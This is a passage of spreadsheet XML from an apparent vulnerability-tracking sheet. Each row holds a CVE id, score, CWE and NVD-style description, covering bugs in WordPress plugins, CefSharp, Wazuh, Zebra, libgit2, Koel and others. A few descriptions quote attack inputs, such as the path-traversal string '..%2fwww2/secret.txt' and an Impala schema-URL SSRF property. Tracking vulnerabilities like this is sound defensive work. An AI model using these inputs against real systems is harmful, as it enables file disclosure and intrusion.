          <t>The ShareOpenly WordPress plugin prior to version 1.2.1 contains a Cross-Site Scripting vulnerability caused by the absence of WordPress's `esc_url()` escaping function on the `$url` variable before it is rendered into HTML content. This variable is constructed from `home_url( add_query_arg( array(), $wp-&gt;request ) )` and is concatenated directly into an HTML `href` attribute on every singular post or page where the plugin's sharing link is displayed. WordPress's security handbook mandates that every URL placed in HTML output must be passed through `esc_url()`, which both HTML-encodes special characters (converting `"`, `&lt;`, `&gt;` into their safe HTML entity equivalents) and strips dangerous URI schemes such as `javascript:` and `data:`. The omission of this function means that if the `$url` value ever contains HTML-special characters or a dangerous URI scheme — through a `home_url` WordPress filter applied by another plugin or theme, through certain web server or hosting configurations, or through future code changes — the unescaped content will be injected verbatim into the rendered HTML of every post or page on the site. Version 1.2.1 contains a patch for the issue.</t>
        </is>
      </c>
      <c r="M5075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48094</t>
        </is>
      </c>
    </row>
    <row r="5076">
      <c r="A5076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48796</t>
        </is>
      </c>
      <c r="C5076" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5076" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5076" s="5" t="inlineStr"/>
      <c r="F5076" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5076" s="5" t="inlineStr">
        <is>
          <t>windows, .net</t>
        </is>
      </c>
      <c r="H5076" s="5" t="inlineStr"/>
      <c r="I5076" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5076" s="5" t="inlineStr"/>
      <c r="K5076" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5076" s="5" t="inlineStr">
        <is>
          <t>CefSharp provides .NET bindings for the Chromium Embedded Framework for Windows Forms and Windows Presentation Foundation applications. Prior to version 148.0.90, CefSharp/SchemeHandler/FolderSchemeHandlerFactory.cs used filePath.StartsWith(rootFolder, StringComparison.OrdinalIgnoreCase) to decide whether a decoded and canonicalized request path remained inside rootFolder. That raw prefix test did not enforce a directory boundary, so a request such as ..%2fwww2/secret.txt could escape a configured www directory into a sibling www2 directory whose path shared the same string prefix. Applications that register FolderSchemeHandlerFactory for a custom scheme or an HTTP or HTTPS scheme can therefore serve local files outside the intended root when an attacker can cause the embedded browser to request the crafted URL. The issue affects both Unix-style paths such as /tmp/app/www2 and Windows paths such as C:\app\www2, and the fix appends a directory separator to the normalized root before comparison while rejecting null bytes and alternate data stream syntax. This issue is fixed in version 148.0.90.</t>
        </is>
      </c>
      <c r="M5076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48796</t>
        </is>
      </c>
    </row>
    <row r="5077">
      <c r="A5077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49392</t>
        </is>
      </c>
      <c r="C5077" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5077" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5077" s="5" t="inlineStr"/>
      <c r="F5077" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5077" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5077" s="5" t="inlineStr"/>
      <c r="I5077" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5077" s="5" t="inlineStr"/>
      <c r="K5077" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-89</t>
        </is>
      </c>
      <c r="L5077" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.6.0 until 4.14.6 and 5.0.0-beta3, DB::getFile() and DB::searchFile() in src/syscheckd/src/db/src/file.cpp concatenate a monitored file path into SQLite row filters. On non-Windows systems, FIMDBCreator::encodeString() does not escape the value. A local user who can create a filename in a File Integrity Monitoring directory can inject a UNION SELECT expression when wazuh-syscheckd processes or deletes that path. The confirmed primitive manipulates SELECT result sets consumed by the FIM code; stacked statements and remote code execution were not demonstrated. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M5077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49392</t>
        </is>
      </c>
    </row>
    <row r="5078">
      <c r="A5078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4945</t>
        </is>
      </c>
      <c r="C5078" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5078" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5078" s="5" t="inlineStr"/>
      <c r="F5078" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5078" s="5" t="inlineStr"/>
      <c r="H5078" s="5" t="inlineStr"/>
      <c r="I5078" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5078" s="5" t="inlineStr"/>
      <c r="K5078" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5078" s="5" t="inlineStr">
        <is>
          <t>The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor &amp; FSE plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.1.7 via the 'watch_checkout' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to pay for a lower-cost product while obtaining entitlement for a premium product by manipulating the product_id parameter independently of the price_id parameter in the Stripe checkout URL.</t>
        </is>
      </c>
      <c r="M5078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4945</t>
        </is>
      </c>
    </row>
    <row r="5079">
      <c r="A5079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50159</t>
        </is>
      </c>
      <c r="C5079" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5079" s="5" t="inlineStr"/>
      <c r="F5079" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G5079" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5079" s="5" t="inlineStr"/>
      <c r="I5079" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5079" s="5" t="inlineStr"/>
      <c r="K5079" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L5079" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.8 and 11.16.1, Mermaid is vulnerable to CSS injection via sibling combinator selectors generated from diagram-supplied class or id names. An attacker who can supply diagram text can inject arbitrary CSS into the rendered page, potentially altering the appearance or behavior of unrelated page elements. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M5079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50159</t>
        </is>
      </c>
    </row>
    <row r="5080">
      <c r="A5080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50554</t>
        </is>
      </c>
      <c r="C5080" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5080" s="5" t="inlineStr"/>
      <c r="F5080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5080" s="5" t="inlineStr"/>
      <c r="H5080" s="5" t="inlineStr"/>
      <c r="I5080" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5080" s="5" t="inlineStr"/>
      <c r="K5080" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-285</t>
        </is>
      </c>
      <c r="L5080" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, GET /api/books/{bookID}/notes is an unauthenticated endpoint that accepts a "deleted" query parameter. When the request is ?deleted=true, the service runs the query with Unscoped() (bypassing GORM's soft-delete scope) but keeps the read-authorization clause as "owner_id = ? OR is_public = ?". As a result, any unauthenticated caller can enumerate the metadata of soft-deleted ("trashed") notes belonging to any public book — notes the owner explicitly deleted and expected to be removed from public view. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="M5080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50554</t>
        </is>
      </c>
    </row>
    <row r="5081">
      <c r="A5081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52732</t>
        </is>
      </c>
      <c r="C5081" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5081" s="5" t="inlineStr"/>
      <c r="F5081" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5081" s="5" t="inlineStr"/>
      <c r="H5081" s="5" t="inlineStr"/>
      <c r="I5081" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5081" s="5" t="inlineStr"/>
      <c r="K5081" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5081" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, one unauthenticated P2P peer can monopolize all 25 MAX_INBOUND_CONCURRENCY slots in Zebra's inbound mempool download and verification pipeline. In zebrad/src/components/mempool/downloads.rs, the bounded queue was shared globally without per-peer accounting, while peer identity was not carried through Gossip and FullQueue responses were mapped to Response::Nil instead of reaching overload disconnection handling. An attacker can advertise fake transaction identifiers and remain silent so each task holds a slot until TRANSACTION_DOWNLOAD_TIMEOUT, then periodically refill the queue as slots expire. While saturated, honest peer transactions and local sendrawtransaction requests are rejected with MempoolError::FullQueue, although block validation and synchronization continue. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M5081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52732</t>
        </is>
      </c>
    </row>
    <row r="5082">
      <c r="A5082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52734</t>
        </is>
      </c>
      <c r="C5082" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5082" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5082" s="5" t="inlineStr"/>
      <c r="F5082" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5082" s="5" t="inlineStr"/>
      <c r="H5082" s="5" t="inlineStr"/>
      <c r="I5082" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5082" s="5" t="inlineStr"/>
      <c r="K5082" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5082" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, an unauthenticated P2P peer can cause the mempool download pipeline to retain transactions after verification reaches the outer RATE_LIMIT_DELAY timeout. In zebrad/src/components/mempool/downloads.rs, Downloads::poll_next removed cancel_handles entries after success and ordinary verification errors, but tokio::time::error::Elapsed did not carry the UnminedTxId needed to remove the timed-out entry. Each retained cancel_handles entry could hold a full Gossip::Tx(UnminedTx), while normal mined-transaction cleanup could not match attacker transactions and no periodic garbage collection or count cap existed. Sustained traffic therefore caused monotonic memory growth until swap pressure degraded the node or the operating system terminated the zebrad process for exhausting memory. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M5082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52734</t>
        </is>
      </c>
    </row>
    <row r="5083">
      <c r="A5083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52737</t>
        </is>
      </c>
      <c r="C5083" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5083" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5083" s="5" t="inlineStr"/>
      <c r="F5083" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5083" s="5" t="inlineStr"/>
      <c r="H5083" s="5" t="inlineStr"/>
      <c r="I5083" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5083" s="5" t="inlineStr"/>
      <c r="K5083" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L5083" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a malicious unauthenticated P2P peer can answer Zebra's outbound getblocks or FindBlocks request with a small two-hash inventory and then serve a syntactically valid block whose coinbase height is far above the local chain tip. In zebrad/src/components/sync/downloads.rs, BlockDownloadVerifyError::AboveLookaheadHeightLimit originally carried only the block height and hash, so handle_block_response could not attribute the failure to the advertising peer. The error then reached the restart-worthy default path in zebrad/src/components/sync.rs, cancelling all in-flight downloads from honest peers and imposing a 67-second sync restart delay on mainnet. Because the peer was neither scored nor disconnected, the peer could repeat the cycle indefinitely with minimal bandwidth and significantly degrade synchronization without corrupting state. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M5083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52737</t>
        </is>
      </c>
    </row>
    <row r="5084">
      <c r="A5084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53458</t>
        </is>
      </c>
      <c r="C5084" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5084" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5084" s="5" t="inlineStr"/>
      <c r="F5084" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5084" s="5" t="inlineStr"/>
      <c r="H5084" s="5" t="inlineStr"/>
      <c r="I5084" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5084" s="5" t="inlineStr"/>
      <c r="K5084" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L5084" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio backend API handlers in custom_components/blueprint_studio/backend/api.py returned raw exception strings to authenticated Home Assistant users. Some exception messages could contain internal filesystem paths or implementation details. The disclosed information could help an authenticated user fingerprint a Home Assistant installation and refine follow-up attacks. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M5084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53458</t>
        </is>
      </c>
    </row>
    <row r="5085">
      <c r="A5085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53497</t>
        </is>
      </c>
      <c r="C5085" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5085" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5085" s="5" t="inlineStr"/>
      <c r="F5085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5085" s="5" t="inlineStr"/>
      <c r="H5085" s="5" t="inlineStr"/>
      <c r="I5085" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5085" s="5" t="inlineStr"/>
      <c r="K5085" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="L5085" s="5" t="inlineStr">
        <is>
          <t>CrossWatch (CW) is a synchronization engine. Prior to version 0.9.21, GET /api/app-auth/status is accessible without authentication and returns the other_sessions array, which exposes metadata of all active sessions — including originating IP addresses, User-Agent strings, internal session IDs, and creation/expiry timestamps. Any unauthenticated network attacker can enumerate this data without credentials. Version 0.9.21 fixes the issue.</t>
        </is>
      </c>
      <c r="M5085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53497</t>
        </is>
      </c>
    </row>
    <row r="5086">
      <c r="A5086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53569</t>
        </is>
      </c>
      <c r="C5086" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5086" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5086" s="5" t="inlineStr"/>
      <c r="F5086" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5086" s="5" t="inlineStr"/>
      <c r="H5086" s="5" t="inlineStr"/>
      <c r="I5086" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5086" s="5" t="inlineStr"/>
      <c r="K5086" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5086" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. In version 16.31.0 and earlier, the whitelisted toggle_like and mark_as_seen endpoints in frappe/desk/like.py and frappe/desk/doctype/note/note.py do not enforce read permission before modifying _liked_by metadata or a Note seen state. An authenticated user can interact with documents or notes that the user cannot read, disclosing resource existence and modifying resource-associated metadata. No released fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M5086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53569</t>
        </is>
      </c>
    </row>
    <row r="5087">
      <c r="A5087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53585</t>
        </is>
      </c>
      <c r="C5087" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5087" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5087" s="5" t="inlineStr"/>
      <c r="F5087" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5087" s="5" t="inlineStr"/>
      <c r="H5087" s="5" t="inlineStr"/>
      <c r="I5087" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5087" s="5" t="inlineStr"/>
      <c r="K5087" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5087" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, git_delta_apply in src/libgit2/delta.c trusts the attacker-controlled res_sz value parsed by hdr_sz from a delta object header and passes that amount to git__malloc before validating delta instructions. Malicious pack data supplied through git_clone, git_fetch, git_remote_fetch, git_indexer_append, or a local attacker-supplied repository can use a very small multi-level OFS_DELTA chain to retain extremely large allocations and exhaust memory. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M5087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53585</t>
        </is>
      </c>
    </row>
    <row r="5088">
      <c r="A5088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53654</t>
        </is>
      </c>
      <c r="C5088" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5088" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5088" s="5" t="inlineStr"/>
      <c r="F5088" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5088" s="5" t="inlineStr"/>
      <c r="H5088" s="5" t="inlineStr"/>
      <c r="I5088" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5088" s="5" t="inlineStr"/>
      <c r="K5088" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5088" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 3.8.5, the Login plugin twofa_cancel task accepts a client-controlled _redirect field without a nonce and allows an unauthenticated request to set an external http, https, or protocol-relative Location target. Controller::execute() applies the field when taskTwofa_cancel() sets no redirect, and Grav::getRedirectResponse() accepts the target through Uri::isExternal(), enabling phishing redirects from a trusted Grav host. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="M5088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53654</t>
        </is>
      </c>
    </row>
    <row r="5089">
      <c r="A5089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54048</t>
        </is>
      </c>
      <c r="C5089" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5089" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5089" s="5" t="inlineStr"/>
      <c r="F5089" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5089" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H5089" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I5089" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5089" s="5" t="inlineStr"/>
      <c r="K5089" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5089" s="5" t="inlineStr">
        <is>
          <t>Specifying tblproperties('avro.schema.url'=' http://...' ) or with a 'file:///' URI on a table in Impala 2.0.0 to 4.5.1 on all platforms allows an attacker to trigger a GET request to internal endpoints they may not have access to but that Impala does and the response my be exposed via parsing error messages.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M5089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54048</t>
        </is>
      </c>
    </row>
    <row r="5090">
      <c r="A5090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54084</t>
        </is>
      </c>
      <c r="C5090" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5090" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5090" s="5" t="inlineStr"/>
      <c r="F5090" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5090" s="5" t="inlineStr"/>
      <c r="H5090" s="5" t="inlineStr"/>
      <c r="I5090" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5090" s="5" t="inlineStr"/>
      <c r="K5090" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L5090" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.0.0 through 4.14.6, a malicious or man-in-the-middle enrollment manager can crash a Wazuh agent during enrollment by returning a malformed key response with fewer than four fields, causing a NULL pointer dereference. The  w_enrollment_process_agent_key()  routine splits the manager-provided key into four space-separated fields but does not verify that all fields are present before passing them to validators. Because OS_StrBreak() leaves missing trailing entries as NULL and OS_IsValidName() calls strlen() on its argument without a NULL check, a response such as  OSSEC K:'1'  reaches OS_IsValidName(NULL) and terminates the agent process. Since Wazuh permits enrollment against an unverified manager when no CA certificate is configured, an attacker operating a rogue manager or intercepting the enrollment flow can deterministically crash agents, resulting in denial of service. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M5090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54084</t>
        </is>
      </c>
    </row>
    <row r="5091">
      <c r="A5091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54338</t>
        </is>
      </c>
      <c r="C5091" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5091" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5091" s="5" t="inlineStr"/>
      <c r="F5091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5091" s="5" t="inlineStr"/>
      <c r="H5091" s="5" t="inlineStr"/>
      <c r="I5091" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5091" s="5" t="inlineStr"/>
      <c r="K5091" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5091" s="5" t="inlineStr">
        <is>
          <t>JupyterHub is software that allows users to create a multi-user server for Jupyter notebooks. Prior to 5.5.0, invalid input to form-based login authenticators can place an unbounded attacker-controlled username in failed-login logs, allowing an unauthenticated attacker to consume logging and storage resources. This issue is fixed in version 5.5.0.</t>
        </is>
      </c>
      <c r="M5091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54338</t>
        </is>
      </c>
    </row>
    <row r="5092">
      <c r="A5092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54494</t>
        </is>
      </c>
      <c r="C5092" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5092" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5092" s="5" t="inlineStr"/>
      <c r="F5092" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5092" s="5" t="inlineStr"/>
      <c r="H5092" s="5" t="inlineStr"/>
      <c r="I5092" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5092" s="5" t="inlineStr"/>
      <c r="K5092" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5092" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.1, App\Helpers\Network::isPublicHost() uses filter_var() with FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE, which treats NAT64 64:ff9b::/96 and 6to4 2002::/16 wrappers of private, loopback, or link-local IPv4 addresses as public. An authenticated user can place such an address in a podcast RSS &lt;enclosure url&gt; and reach app/Values/Podcast/EpisodePlayable.php through EpisodePlayable::createForEpisode(), where isSafeUrl() accepts the target and Http::sink($file)-&gt;get($url) fetches it. On a host with NAT64 or 6to4 routing, Koel can request internal services or cloud metadata and return the response body to the user. This issue is fixed in version 9.7.1</t>
        </is>
      </c>
      <c r="M5092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54494</t>
        </is>
      </c>
    </row>
    <row r="5093">
      <c r="A5093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54741</t>
        </is>
      </c>
      <c r="C5093" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5093" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5093" s="5" t="inlineStr"/>
      <c r="F5093" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5093" s="5" t="inlineStr"/>
      <c r="H5093" s="5" t="inlineStr"/>
      <c r="I5093" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5093" s="5" t="inlineStr"/>
      <c r="K5093" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5093" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to 0.19.19 and 1.0.0-alpha.18, Lemmy blocks new private messages from a sender after the recipient blocks that sender, but the edit path skips the same block check. create_private_message checks the recipient's block list with PersonActions::read_block before inserting a message, while edit_private_message in crates/api/api_crud/src/private_message/update.rs only checks that the caller is orig_private_message.creator_id. The update then writes new content and returns the modified PrivateMessageView without consulting the recipient's block list, allowing a blocked sender to keep changing an old message that the recipient can still see and providing a post-block harassment path. This issue is fixed in versions 0.19.19 and 1.0.0-alpha.18.</t>
        </is>
      </c>
